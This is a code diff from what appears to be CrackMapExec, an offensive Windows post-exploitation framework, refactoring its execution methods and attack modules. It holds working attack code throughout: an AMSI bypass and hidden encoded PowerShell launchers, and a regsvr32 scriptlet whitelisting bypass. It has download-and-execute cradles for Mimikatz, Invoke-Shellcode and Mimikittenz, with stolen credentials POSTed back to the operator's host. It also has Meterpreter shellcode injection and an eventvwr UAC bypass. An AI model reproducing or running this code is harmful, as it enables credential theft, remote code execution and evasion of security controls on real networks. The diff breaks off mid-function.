         self.__port = port
         self.__username = username
         self.__password = password
@@ -59,52 +61,33 @@ class SMBEXEC:
         self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
         resp = scmr.hROpenSCManagerW(self.__scmr)
         self.__scHandle = resp['lpScHandle']
-        self.transferClient = self.__rpctransport.get_smb_connection()
 
     def execute(self, command, output=False):
         self.__retOutput = output
-        if self.__retOutput:
+        self.execute_fileless(command)
-            self.cd('')
-
-        self.execute_remote(command)
         self.finish()
         return self.__outputBuffer
 
-    def cd(self, s):
+    def output_callback(self, data):
-        ret_state = self.__retOutput
-        self.__retOutput = False
-        self.execute_remote('cd ' )
-        self.__retOutput = ret_state
-
-    def get_output(self):
-
-        if self.__retOutput is False:
-            self.__outputBuffer = ''
-            return
-
-        def output_callback(data):
         self.__outputBuffer += data
 
-        while True:
+    def execute_fileless(self, data):
-            try:
+        self.__output = gen_random_string(6)
-                self.transferClient.getFile(self.__share, self.__output, output_callback)        
+        self.__batchFile = gen_random_string(6) + '.bat'
-                self.transferClient.deleteFile(self.__share, self.__output)
+        local_ip = self.__rpctransport.get_socket().getsockname()[0]
-                break
-            except Exception:
-                sleep(2)
-
-    def execute_remote(self, data):
-        self.__output = '\\Windows\\Temp\\' + gen_random_string() 
-        self.__batchFile = '%TEMP%\\' + gen_random_string() + '.bat'
 
         if self.__retOutput:
-            command = self.__shell + 'echo ' + data + ' ^> ' + self.__output + ' 2^>^&1 > ' + self.__batchFile + ' & ' + self.__shell + self.__batchFile 
+            command = self.__shell + data + ' ^> \\\\{}\\{}\\{}'.format(local_ip, self.__share_name, self.__output)
         else:
-            command = self.__shell + 'echo ' + data + ' 2^>^&1 > ' + self.__batchFile + ' & ' + self.__shell + self.__batchFile 
+            command = self.__shell + data
 
-        command += ' & ' + 'del ' + self.__batchFile 
+        with open(os.path.join('/tmp', 'cme_hosted', self.__batchFile), 'w') as batch_file:
+            batch_file.write(command)
 
-        logging.debug('Executing command: ' + command)
+        logging.debug('Hosting batch file with command: ' + command)
+
+        command = self.__shell + '\\\\{}\\{}\\{}'.format(local_ip,self.__share_name, self.__batchFile)
+        logging.debug('Command to execute: ' + command)
 
         resp = scmr.hRCreateServiceW(self.__scmr, self.__scHandle, self.__serviceName, self.__serviceName, lpBinaryPathName=command)
         service = resp['lpServiceHandle']
@@ -115,7 +98,18 @@ class SMBEXEC:
            pass
         scmr.hRDeleteService(self.__scmr, service)
         scmr.hRCloseServiceHandle(self.__scmr, service)
-        self.get_output()
+        self.get_output_fileless()
+
+    def get_output_fileless(self):
+        if not self.__retOutput: return 
+
+        while True:
+            try:
+                with open(os.path.join('/tmp', 'cme_hosted', self.__output), 'r') as output:
+                    self.output_callback(output.read())
+                break
+            except IOError:
+                sleep(2)
 
     def finish(self):
         # Just in case the service is still created

cme/execmethods/wmiexec.py

@@ -1,4 +1,5 @@
 import ntpath, logging
+import os
 
 from gevent import sleep
 from cme.helpers import gen_random_string
@@ -7,7 +8,7 @@ from impacket.dcerpc.v5.dcom import wmi
 from impacket.dcerpc.v5.dtypes import NULL
 
 class WMIEXEC:
-    def __init__(self, target, username, password, domain, smbconnection, hashes=None, share=None):
+    def __init__(self, target, share_name, username, password, domain, smbconnection, hashes=None, share=None):
         self.__target = target
         self.__username = username
         self.__password = password
@@ -18,6 +19,7 @@ class WMIEXEC:
         self.__smbconnection = smbconnection
         self.__output = None
         self.__outputBuffer = ''
+        self.__share_name = share_name
         self.__shell = 'cmd.exe /Q /c '
         self.__pwd = 'C:\\'
         self.__aesKey = None
@@ -46,9 +48,8 @@ class WMIEXEC:
         self.__retOutput = output
         if self.__retOutput:
             self.__smbconnection.setTimeout(100000)
-            self.cd('\\')
 
-        self.execute_remote(command)
+        self.execute_handler(command)
         self.__dcom.disconnect()
         return self.__outputBuffer
 
@@ -63,6 +64,19 @@ class WMIEXEC:
             self.__pwd = self.__outputBuffer.strip('\r\n')
             self.__outputBuffer = ''
 
+    def output_callback(self, data):
+        self.__outputBuffer += data
+
+    def execute_handler(self, data):
+        if self.__retOutput:
+            try:
+                self.execute_fileless(data)
+            except:
+                self.cd('\\')
+                self.execute_remote(data)
+        else:
+            self.execute_remote(data)
+
     def execute_remote(self, data):
         self.__output = '\\Windows\\Temp\\' + gen_random_string(6)
 
@@ -72,20 +86,35 @@ class WMIEXEC:
 
         logging.debug('Executing command: ' + command)
         self.__win32Process.Create(command, self.__pwd, None)
-        self.get_output()
+        self.get_output_remote()
 
-    def get_output(self):
+    def execute_fileless(self, data):
+        self.__output = gen_random_string(6)
+        local_ip = self.__smbconnection.getSMBServer().get_socket().getsockname()[0]
 
+        command = self.__shell + data + ' 1> \\\\{}\\{}\\{} 2>&1'.format(local_ip, self.__share_name, self.__output)
+
+        logging.debug('Executing command: ' + command)
+        self.__win32Process.Create(command, self.__pwd, None)
+        self.get_output_fileless()
+
+    def get_output_fileless(self):
+        while True:
+            try:
+                with open(os.path.join('/tmp', 'cme_hosted', self.__output), 'r') as output:
+                    self.output_callback(output.read())
+                break
+            except IOError:
+                sleep(2)
+
+    def get_output_remote(self):
         if self.__retOutput is False:
             self.__outputBuffer = ''
             return
 
-        def output_callback(data):
-            self.__outputBuffer += data
-
         while True:
             try:
-                self.__smbconnection.getFile(self.__share, self.__output, output_callback)
+                self.__smbconnection.getFile(self.__share, self.__output, self.output_callback)
                 break
             except Exception as e:
                 if str(e).find('STATUS_SHARING_VIOLATION') >=0:

cme/first_run.py

@@ -6,12 +6,16 @@ from subprocess import check_output, PIPE
 from sys import exit
 
 CME_PATH  = os.path.expanduser('~/.cme')
+TMP_PATH  = os.path.join('/tmp', 'cme_hosted')
 DB_PATH   = os.path.join(CME_PATH, 'cme.db')
 CERT_PATH = os.path.join(CME_PATH, 'cme.pem')
 CONFIG_PATH = os.path.join(CME_PATH, 'cme.conf')
 
 def first_run_setup(logger):
 
+    if not os.path.exists(TMP_PATH):
+        os.mkdir(TMP_PATH)
+
     if not os.path.exists(CME_PATH):
         logger.info('First time use detected')
         logger.info('Creating home directory structure') 

cme/helpers.py

@@ -25,25 +25,18 @@ def write_log(data, log_name):
     with open(os.path.join(logs_dir, log_name), 'w') as mimikatz_output:
         mimikatz_output.write(data)
 
-def obfs_ps_script(script, function_name=None):
+def obfs_ps_script(script):
     """
     Strip block comments, line comments, empty lines, verbose statements,
     and debug statements from a PowerShell source file.
-
-    If the function_name paramater is passed, replace the main powershell function name with it
     """
-    if function_name:
-        function_line = script.split('\n', 1)[0]
-        if function_line.find('function') != -1:
-            script = re.sub('-.*', '-{}\r'.format(function_name), script, count=1)
-
     # strip block comments
     strippedCode = re.sub(re.compile('<#.*?#>', re.DOTALL), '', script)
     # strip blank lines, lines starting with #, and verbose/debug statements
     strippedCode = "\n".join([line for line in strippedCode.split('\n') if ((line.strip() != '') and (not line.strip().startswith("#")) and (not line.strip().lower().startswith("write-verbose ")) and (not line.strip().lower().startswith("write-debug ")) )])
     return strippedCode
 
-def create_ps_command(ps_command, force_ps32=False):
+def create_ps_command(ps_command, force_ps32=False, nothidden=False):
     ps_command = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};
 try{{ 
 [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
@@ -69,9 +62,15 @@ else
 
 }}""".format(b64encode(ps_command.encode('UTF-16LE')))
         
+        if nothidden is True:
+            command = 'powershell.exe -exec bypass -window maximized -encoded {}'.format(b64encode(command.encode('UTF-16LE')))
+        else:
             command = 'powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(b64encode(command.encode('UTF-16LE')))
 
     elif not force_ps32:
+        if nothidden is True:
+            command = 'powershell.exe -exec bypass -window maximized -encoded {}'.format(b64encode(ps_command.encode('UTF-16LE')))
+        else:
             command = 'powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(b64encode(ps_command.encode('UTF-16LE')))
 
     return command 

cme/modulechainloader.py

@@ -0,0 +1,81 @@
+import imp
+import os
+import sys
+import cme
+from logging import getLogger
+from cme.context import Context
+from cme.logger import CMEAdapter
+from cme.cmechainserver import CMEChainServer
+from cme.moduleloader import ModuleLoader
+
+class ModuleChainLoader(ModuleLoader):
+
+    def __init__(self, args, db, logger):
+        ModuleLoader.__init__(self, args, db, logger)
+
+        self.chain_list = []
+
+        #This parses the chain command
+        for module in self.args.module_chain.split('=>'):
+            if '[' in module:
+                module_name = module.split('[')[0]
+                module_options = module.split('[')[1][:-1]
+
+                module_dict = {'name': module_name}
+
+                module_dict['options'] = {}
+                for option in module_options.split(';;'):
+                    key, value = option.split('=', 1)
+                    if value[:1] == ('"' or "'") and value[-1:] == ('"' or "'"):
+                        value = value[1:-1]
+                    
+                    module_dict['options'][str(key).upper()] = value
+
+                self.chain_list.append(module_dict)
+
+            else:
+                module_dict = {'name': module}
+                module_dict['options'] = {}
+
+                self.chain_list.append(module_dict)
+
+    def is_module_chain_sane(self):
+        last_module = self.chain_list[-1]['name']
+
+        #Confirm that every chained module (except for the last one) actually supports chaining
+        for module in self.chain_list:
+            if module['name'] == last_module:
+                continue
+
+            module_object = module['object']
+            if getattr(module_object, 'chain_support') is not True:
+                return False
+
+        return True
+
+    def init_module_chain(self):
+        modules = self.get_modules()
+
+        #Initialize all modules specified in the chain command and add the objects to chain_list
+        for chained_module in self.chain_list:
+            for module in modules:
+                if module.lower() == chained_module['name'].lower():
+                    chained_module['object'] = self.load_module(modules[module]['path'])
+
+        for module in self.chain_list:
+            module_logger = CMEAdapter(getLogger('CME'), {'module': module['name'].upper()})
+            context = Context(self.db, module_logger, self.args)
+
+            if module['object'] != self.chain_list[-1]['object']: module['options']['COMMAND'] = 'dont notice me senpai'
+            getattr(module['object'], 'options')(context, module['options'])
+
+        if self.is_module_chain_sane():
+            server_logger = CMEAdapter(getLogger('CME'), {'module': 'CMESERVER'})
+            context = Context(self.db, server_logger, self.args)
+
+
+            server = CMEChainServer(self.chain_list, context, self.logger, self.args.server_host, self.args.server_port, self.args.server)
+            server.start()
+            return self.chain_list, server
+
+        return None, None

cme/moduleloader.py

@@ -13,7 +13,6 @@ class ModuleLoader:
         self.args = args
         self.db = db
         self.logger = logger
-        self.server_port = args.server_port
         self.cme_path = os.path.expanduser('~/.cme')
 
     def module_is_sane(self, module, module_path):
@@ -27,10 +26,22 @@ class ModuleLoader:
             self.logger.error('{} missing the description variable'.format(module_path))
             module_error = True
 
+        elif not hasattr(module, 'chain_support'):
+            self.logger.error('{} missing the chain_support variable'.format(module_path))
+            module_error = True    
+
         elif not hasattr(module, 'options'):
             self.logger.error('{} missing the options function'.format(module_path))
             module_error = True
 
+        elif not hasattr(module, 'launcher'):
+            self.logger.error('{} missing the launcher function'.format(module_path))
+            module_error = True
+
+        elif not hasattr(module, 'payload'):
+            self.logger.error('{} missing the payload function'.format(module_path))
+            module_error = True
+
         elif not hasattr(module, 'on_login') and not (module, 'on_admin_login'):
             self.logger.error('{} missing the on_login/on_admin_login function(s)'.format(module_path))
             module_error = True
@@ -57,7 +68,7 @@ class ModuleLoader:
                     module_path = os.path.join(path, module)
                     m = self.load_module(os.path.join(path, module))
                     if m:
-                        modules[m.name] = {'path': os.path.join(path, module), 'description': m.description, 'options': m.options.__doc__}
+                        modules[m.name] = {'path': os.path.join(path, module), 'description': m.description, 'options': m.options.__doc__, 'chain_support': m.chain_support}
 
         return modules
 
@@ -84,12 +95,9 @@ class ModuleLoader:
             if hasattr(module, 'on_request') or hasattr(module, 'has_response'):
 
                 if hasattr(module, 'required_server'):
-                    args.server = getattr(module, 'required_server')
+                    self.args.server = getattr(module, 'required_server')
 
-                if not self.server_port:
+                server = CMEServer(module, context, self.logger, self.args.server_host, self.args.server_port, self.args.server)
-                    self. server_port = self.args.server_port
-
-                server = CMEServer(module, context, self.logger, self.args.server_host, self.server_port, self.args.server)
                 server.start()
 
             return module, context, server

cme/modules/com_exec.py

@@ -5,7 +5,7 @@ import os
 class CMEModule:
 
     '''
-        Executes a command using a COM scriptlet to bypass whitelisting
+        Executes a command using a COM scriptlet to bypass whitelisting (a.k.a squiblydoo)
 
         Based on the awesome research by @subtee
 
@@ -13,53 +13,49 @@ class CMEModule:
         http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html
     '''
 
-    name='com_exec'
+    name='com_exec' #Really tempted just to call this squiblydoo
 
     description = 'Executes a command using a COM scriptlet to bypass whitelisting'
 
     required_server='http'
 
+    chain_support = True
+
     def options(self, context, module_options):
         '''
-            CMD      Command to execute on the target system(s) (Required if CMDFILE isn't specified)
+            COMMAND  Command to execute on the target system(s) (Required if CMDFILE isn't specified)
             CMDFILE  File contaning the command to execute on the target system(s) (Required if CMD isn't specified)
         '''
 
-        if not 'CMD' in module_options and not 'CMDFILE' in module_options:
+        if not 'COMMAND' in module_options and not 'CMDFILE' in module_options:
-            context.log.error('CMD or CMDFILE options are required!')
+            context.log.error('COMMAND or CMDFILE options are required!')
-            sys.exit(1)
+            exit(1)
 
-        if 'CMD' in module_options and 'CMDFILE' in module_options:
+        if 'COMMAND' in module_options and 'CMDFILE' in module_options:
-            context.log.error('CMD and CMDFILE are mutually exclusive!')
+            context.log.error('COMMAND and CMDFILE are mutually exclusive!')
-            sys.exit(1)
+            exit(1)
 
-        if 'CMD' in module_options:
+        if 'COMMAND' in module_options:
-            self.command = module_options['CMD']
+            self.command = module_options['COMMAND']
 
         elif 'CMDFILE' in module_options:
             path = os.path.expanduser(module_options['CMDFILE'])
 
             if not os.path.exists(path):
                 context.log.error('Path to CMDFILE invalid!')
-                sys.exit(1)
+                exit(1)
 
             with open(path, 'r') as cmdfile:
                 self.command = cmdfile.read().strip()
 
         self.sct_name = gen_random_string(5)
 
-    def on_admin_login(self, context, connection):
+    def launcher(self, context, command):
+        launcher = 'regsvr32.exe /u /n /s /i:http://{}/{}.sct scrobj.dll'.format(context.localip, self.sct_name)
+        return launcher
     
-        command = 'regsvr32.exe /u /n /s /i:http://{}/{}.sct scrobj.dll'.format(context.localip, self.sct_name)
+    def payload(self, context, command):
-        connection.execute(command)
+        payload = '''<?XML version="1.0"?>
-        context.log.success('Executed command')
-
-    def on_request(self, context, request):
-        if '{}.sct'.format(self.sct_name) in request.path[1:]:
-            request.send_response(200)
-            request.end_headers()
-
-            com_script = '''<?XML version="1.0"?>
 <scriptlet>
 <registration
     description="Win32COMDebug"
@@ -69,16 +65,29 @@ class CMEModule:
 >
 <script language="JScript">
     <![CDATA[
-        var r = new ActiveXObject("WScript.Shell").Run("{}");
+        var r = new ActiveXObject("WScript.Shell").Run('{}');
     ]]>
 </script>
 </registration>
 <public>
     <method name="Exec"></method>
 </public>
-</scriptlet>'''.format(self.command)
+</scriptlet>'''.format(command)
 
-            request.wfile.write(com_script)
+        context.log.debug('Generated payload:\n' + payload)
+        
+        return payload
+
+    def on_admin_login(self, context, connection, launcher, payload):
+        connection.execute(launcher)
+        context.log.success('Executed squiblydoo')
+
+    def on_request(self, context, request, launcher, payload):
+        if '{}.sct'.format(self.sct_name) in request.path[1:]:
+            request.send_response(200)
+            request.end_headers()
+
+            request.wfile.write(payload)
             request.stop_tracking_host()
 
         else:

cme/modules/empire_exec.py

@@ -16,6 +16,8 @@ class CMEModule:
 
     description = "Uses Empire's RESTful API to generate a launcher for the specified listener and executes it"
 
+    chain_support = False
+
     def options(self, context, module_options):
         '''
             LISTENER    Listener name to generate the launcher for
@@ -54,7 +56,12 @@ class CMEModule:
             context.log.error("Unable to connect to Empire's RESTful API: {}".format(e))
             sys.exit(1)
 
-    def on_admin_login(self, context, connection):
+    def launcher(self, context, command):
-        if self.empire_launcher:
+        return self.empire_launcher
-            connection.execute(self.empire_launcher)
+
+    def payload(self, context, command):
+        return
+
+    def on_admin_login(self, context, connection, launcher, payload):
+        connection.execute(launcher)
         context.log.success('Executed Empire Launcher')

cme/modules/enum_chrome.py

@@ -1,4 +1,4 @@
-from cme.helpers import create_ps_command, get_ps_script, obfs_ps_script, gen_random_string, validate_ntlm, write_log
+from cme.helpers import create_ps_command, get_ps_script, obfs_ps_script, validate_ntlm, write_log
 from datetime import datetime
 from StringIO import StringIO
 import re
@@ -13,13 +13,14 @@ class CMEModule:
 
     description = "Uses Powersploit's Invoke-Mimikatz.ps1 script to decrypt saved Chrome passwords"
 
+    chain_support = False
+
     def options(self, context, module_options):
         '''
         '''
+        return
 
-        self.obfs_name = gen_random_string()
+    def launcher(self, context, command):
-
-    def on_admin_login(self, context, connection):
 
         '''
             Oook.. Think my heads going to explode
@@ -30,7 +31,7 @@ class CMEModule:
             As far as I can figure out there is no way around this, hence we have to first copy Chrome's database to a path without any spaces and then decrypt the entries with Mimikatz
         '''
         
-        payload = '''
+        launcher = '''
         $cmd = "privilege::debug sekurlsa::dpapi"
         $userdirs = get-childitem "$Env:SystemDrive\Users"
         foreach ($dir in $userdirs) {{
@@ -47,7 +48,7 @@ class CMEModule:
         $cmd = $cmd + " exit"
 
         IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/Invoke-Mimikatz.ps1');
-        $creds = Invoke-{func_name} -Command $cmd;
+        $creds = Invoke-Mimikatz -Command $cmd;
         $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
         $request.Method = 'POST';
         $request.ContentType = 'application/x-www-form-urlencoded';
@@ -58,15 +59,19 @@ class CMEModule:
         $requestStream.Close();
         $request.GetResponse();'''.format(server=context.server, 
                                           port=context.server_port, 
-                                          addr=context.localip,
+                                          addr=context.localip)
-                                          func_name=self.obfs_name)
 
-        context.log.debug('Payload: {}'.format(payload))
+        return create_ps_command(launcher)
-        payload = create_ps_command(payload)
-        connection.execute(payload, methods=['atexec', 'smbexec'])
-        context.log.success('Executed payload')
 
-    def on_request(self, context, request):
+    def payload(self, context, command):
+        with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script:
+            return obfs_ps_script(ps_script.read())
+
+    def on_admin_login(self, context, connection, launcher, payload):
+        connection.execute(launcher, methods=['atexec', 'smbexec'])
+        context.log.success('Executed launcher')
+
+    def on_request(self, context, request, launcher, payload):
         if 'Invoke-Mimikatz.ps1' == request.path[1:]:
             request.send_response(200)
             request.end_headers()
@@ -79,9 +84,7 @@ class CMEModule:
             Here we call the updated PowerShell script instead of PowerSploits version
             '''
 
-            with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script:
+            request.wfile.write(payload)
-                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
-                request.wfile.write(ps_script)
 
         else:
             request.send_response(404)

cme/modules/eventvwr_bypass.py

@@ -0,0 +1,76 @@
+from cme.helpers import create_ps_command, get_ps_script
+from sys import exit
+
+class CMEModule:
+
+    '''
+        Executes a command using the the eventvwr.exe fileless UAC bypass
+        Powershell script and vuln discovery by Matt Nelson (@enigma0x3)
+
+        module by @byt3bl33d3r
+    '''
+
+    name = 'eventvwr_bypass'
+
+    description = 'Executes a command using the eventvwr.exe fileless UAC bypass'
+
+    chain_support = True
+
+    def options(self, context, module_options):
+        '''
+            COMMAND  Command to execute on the target system(s) (Required if CMDFILE isn't specified)
+            CMDFILE  File contaning the command to execute on the target system(s) (Required if CMD isn't specified)
+        '''
+
+        if not 'COMMAND' in module_options and not 'CMDFILE' in module_options:
+            context.log.error('COMMAND or CMDFILE options are required!')
+            exit(1)
+
+        if 'COMMAND' in module_options and 'CMDFILE' in module_options:
+            context.log.error('COMMAND and CMDFILE are mutually exclusive!')
+            exit(1)
+
+        if 'COMMAND' in module_options:
+            self.command = module_options['COMMAND']
+
+        elif 'CMDFILE' in module_options:
+            path = os.path.expanduser(module_options['CMDFILE'])
+
+            if not os.path.exists(path):
+                context.log.error('Path to CMDFILE invalid!')
+                exit(1)
+
+            with open(path, 'r') as cmdfile:
+                self.command = cmdfile.read().strip()
+
+    def launcher(self, context, command):
+        launcher = '''
+        IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/Invoke-EventVwrBypass.ps1');
+        Invoke-EventVwrBypass -Force -Command "cmd.exe /c {command}";
+        '''.format(server=context.server,
+                   addr=context.localip,
+                   port=context.server_port,
+                   command=command)
+
+        return create_ps_command(launcher)
+
+    def payload(self, context, command):
+        with open(get_ps_script('Invoke-EventVwrBypass.ps1'), 'r') as ps_script:
+            return ps_script.read()
+
+    def on_admin_login(self, context, connection, launcher, payload):
+        connection.execute(launcher)
+        context.log.success('Executed launcher')
+
+    def on_request(self, context, request, launcher, payload):
+        if request.path[1:] == 'Invoke-EventVwrBypass.ps1':
+            request.send_response(200)
+            request.end_headers()
+
+            request.wfile.write(payload)
+
+            request.stop_tracking_host()
+
+        else:
+            request.send_response(404)
+            request.end_headers()

cme/modules/example_module.py

@@ -9,19 +9,30 @@ class CMEModule:
 
     description = 'Something Something'
 
+    #If the module supports chaining, change this to True
+    chain_support = False
+
     def options(self, context, module_options):
         '''Required. Module options get parsed here. Additionally, put the modules usage here as well'''
         pass
 
+    def launcher(self, context, command):
+        '''Required. Generate your launcher here'''
+        pass
+
+    def payload(self, context, command):
+        '''Required. Generate your payload here'''
+        pass
+
     def on_login(self, context, connection):
         '''Concurrent. Required if on_admin_login is not present. This gets called on each authenticated connection'''
         pass
 
-    def on_admin_login(self, context, connection):
+    def on_admin_login(self, context, connection, launcher, payload):
         '''Concurrent. Required if on_login is not present. This gets called on each authenticated connection with Administrative privileges'''
         pass
 
-    def on_request(self, context, request):
+    def on_request(self, context, request, launcher, payload):
         '''Optional. If the payload needs to retrieve additonal files, add this function to the module'''
         pass
 

cme/modules/met_inject.py

@@ -1,4 +1,4 @@
-from cme.helpers import gen_random_string, create_ps_command, obfs_ps_script, get_ps_script
+from cme.helpers import create_ps_command, obfs_ps_script, get_ps_script
 from sys import exit
 
 class CMEModule:
@@ -6,10 +6,12 @@ class CMEModule:
         Downloads the Meterpreter stager and injects it into memory using PowerSploit's Invoke-Shellcode.ps1 script
         Module by @byt3bl33d3r
     '''
-    name = 'metinject'
+    name = 'met_inject'
 
     description = "Downloads the Meterpreter stager and injects it into memory using PowerSploit's Invoke-Shellcode.ps1 script"
 
+    chain_support = False
+
     def options(self, context, module_options):
         '''
             LHOST    IP hosting the handler
@@ -35,13 +37,13 @@ class CMEModule:
 
         self.lhost = module_options['LHOST']
         self.lport = module_options['LPORT']
-        self.obfs_name = gen_random_string()
 
-    def on_admin_login(self, context, connection):
+    def launcher(self, context, command):
+
         #PowerSploit's 3.0 update removed the Meterpreter injection options in Invoke-Shellcode
         #so now we have to manually generate a valid Meterpreter request URL and download + exec the staged shellcode
 
-        payload = """
+        launcher = """
         IEX (New-Object Net.WebClient).DownloadString('{}://{}:{}/Invoke-Shellcode.ps1')
         $CharArray = 48..57 + 65..90 + 97..122 | ForEach-Object {{[Char]$_}}
         $SumTest = $False
@@ -54,30 +56,32 @@ class CMEModule:
         $Request = "{}://{}:{}/$($RequestUri)"
         $WebClient = New-Object System.Net.WebClient
         [Byte[]]$bytes = $WebClient.DownloadData($Request)
-        Invoke-{} -Force -Shellcode $bytes""".format(context.server,
+        Invoke-Shellcode -Force -Shellcode $bytes""".format(context.server,
                                                      context.localip,
                                                      context.server_port,
                                                      'http' if self.met_payload == 'reverse_http' else 'https',
                                                      self.lhost,
-                                                     self.lport,
+                                                     self.lport)
-                                                     self.obfs_name)
 
         if self.procid:
-            payload += " -ProcessID {}".format(self.procid)
+            launcher += " -ProcessID {}".format(self.procid)
 
-        context.log.debug('Payload:{}'.format(payload))
+        return create_ps_command(launcher, force_ps32=True)
-        payload = create_ps_command(payload, force_ps32=True)
-        connection.execute(payload)
-        context.log.success('Executed payload')
 
-    def on_request(self, context, request):
+    def payload(self, context, command):
+        with open(get_ps_script('PowerSploit/CodeExecution/Invoke-Shellcode.ps1'), 'r') as ps_script:
+            return obfs_ps_script(ps_script.read())
+
+    def on_admin_login(self, context, connection, launcher, payload):
+        connection.execute(launcher)
+        context.log.success('Executed launcher')
+
+    def on_request(self, context, request, launcher, payload):
         if 'Invoke-Shellcode.ps1' == request.path[1:]:
             request.send_response(200)
             request.end_headers()
 
-            with open(get_ps_script('PowerSploit/CodeExecution/Invoke-Shellcode.ps1'), 'r') as ps_script:
+            request.wfile.write(payload)
-                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
-                request.wfile.write(ps_script)
 
             request.stop_tracking_host()
 

cme/modules/mimikatz.py

@@ -1,4 +1,4 @@
-from cme.helpers import create_ps_command, get_ps_script, obfs_ps_script, gen_random_string, validate_ntlm, write_log
+from cme.helpers import create_ps_command, get_ps_script, obfs_ps_script, validate_ntlm, write_log
 from datetime import datetime
 import re
 
@@ -12,25 +12,24 @@ class CMEModule:
 
     description = "Executes PowerSploit's Invoke-Mimikatz.ps1 script"
 
+    chain_support = False
+
     def options(self, context, module_options):
         '''
            COMMAND Mimikatz command to execute (default: 'sekurlsa::logonpasswords')
         '''
 
-        self.mimikatz_command = 'privilege::debug sekurlsa::logonpasswords exit'
+        self.command = 'privilege::debug sekurlsa::logonpasswords exit'
 
         if module_options and 'COMMAND' in module_options:
-            self.mimikatz_command = module_options['COMMAND']
+            self.command = module_options['COMMAND']
 
         #context.log.debug("Mimikatz command: '{}'".format(self.mimikatz_command))
 
-        self.obfs_name = gen_random_string()
+    def launcher(self, context, command):
-
+        launcher = '''
-    def on_admin_login(self, context, connection):
-
-        payload = '''
         IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/Invoke-Mimikatz.ps1');
-        $creds = Invoke-{func_name} -Command '{command}';
+        $creds = Invoke-Mimikatz -Command '{command}';
         $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
         $request.Method = 'POST';
         $request.ContentType = 'application/x-www-form-urlencoded';
@@ -42,22 +41,24 @@ class CMEModule:
         $request.GetResponse();'''.format(server=context.server, 
                                           port=context.server_port, 
                                           addr=context.localip,
-                                          func_name=self.obfs_name,
+                                          command=command)
-                                          command=self.mimikatz_command)
         
-        context.log.debug('Payload: {}'.format(payload))
+        return create_ps_command(launcher)
-        payload = create_ps_command(payload)
-        connection.execute(payload)
-        context.log.success('Executed payload')
 
-    def on_request(self, context, request):
+    def payload(self, context, command):
+        with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script:
+            return obfs_ps_script(ps_script.read())
+
+    def on_admin_login(self, context, connection, launcher, payload):
+        connection.execute(launcher)
+        context.log.success('Executed launcher')
+
+    def on_request(self, context, request, launcher, payload):
         if 'Invoke-Mimikatz.ps1' == request.path[1:]:
             request.send_response(200)
             request.end_headers()
 
-            with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script:
+            request.wfile.write(payload)
-                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
-                request.wfile.write(ps_script)
 
         else:
             request.send_response(404)

cme/modules/mimikittenz.py

@@ -1,4 +1,4 @@
-from cme.helpers import create_ps_command, obfs_ps_script, get_ps_script, write_log, gen_random_string
+from cme.helpers import create_ps_command, obfs_ps_script, get_ps_script, write_log
 from StringIO import StringIO
 from datetime import datetime
 from sys import exit
@@ -13,17 +13,17 @@ class CMEModule:
 
     description = "Executes Mimikittenz"
 
+    chain_support = False
+
     def options(self, context, module_options):
         '''
         '''
+        return
 
-        self.obfs_name = gen_random_string()
+    def launcher(self, context, command):
-
+        launcher = '''
-    def on_admin_login(self, context, connection):
-
-        payload = '''
         IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/Invoke-mimikittenz.ps1');
-        $data = Invoke-{command};
+        $data = Invoke-Mimikittenz;
         $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
         $request.Method = 'POST';
         $request.ContentType = 'application/x-www-form-urlencoded';
@@ -34,22 +34,24 @@ class CMEModule:
         $requestStream.Close();
         $request.GetResponse();'''.format(server=context.server, 
                                           port=context.server_port, 
-                                          addr=context.localip,
+                                          addr=context.localip)
-                                          command=self.obfs_name)
 
-        context.log.debug('Payload: {}'.format(payload))
+        return create_ps_command(launcher)
-        payload = create_ps_command(payload)
-        connection.execute(payload)
-        context.log.success('Executed payload')
 
-    def on_request(self, context, request):
+    def payload(self, context, command):
+        with open(get_ps_script('mimikittenz/Invoke-mimikittenz.ps1'), 'r') as ps_script:
+            return obfs_ps_script(ps_script.read())
+
+    def on_admin_login(self, context, connection, launcher, payload):
+        connection.execute(launcher)
+        context.log.success('Executed launcher')
+
+    def on_request(self, context, request, launcher, payload):
         if 'Invoke-mimikittenz.ps1' == request.path[1:]:
             request.send_response(200)
             request.end_headers()
 
-            with open(get_ps_script('mimikittenz/Invoke-mimikittenz.ps1'), 'r') as ps_script:
+            request.wfile.write(payload)
-                ps_script = obfs_ps_script(ps_script.read(), function_name=self.obfs_name)
-                request.wfile.write(ps_script)
 
         else:
             request.send_response(404)

cme/modules/pe_inject.py

@@ -1,4 +1,4 @@
-from cme.helpers import gen_random_string, create_ps_command, obfs_ps_script, get_ps_script
+from cme.helpers import create_ps_command, obfs_ps_script, get_ps_script
 from sys import exit
 import os
 
@@ -7,10 +7,12 @@ class CMEModule:
         Downloads the specified DLL/EXE and injects it into memory using PowerSploit's Invoke-ReflectivePEInjection.ps1 script
         Module by @byt3bl33d3r
     '''
-    name = 'peinject'
+    name = 'pe_inject'
 
     description = "Downloads the specified DLL/EXE and injects it into memory using PowerSploit's Invoke-ReflectivePEInjection.ps1 script"
 
+    chain_support = False
+
     def options(self, context, module_options):
         '''
             PATH     Path to dll/exe to inject
@@ -36,39 +38,39 @@ class CMEModule:
         if 'EXEARGS' in module_options:
             self.exeargs = module_options['EXEARGS']
 
-        self.obfs_name = gen_random_string()
+    def launcher(self, context, command):
-
+        launcher = """
-    def on_admin_login(self, context, connection):
- 
-        payload = """
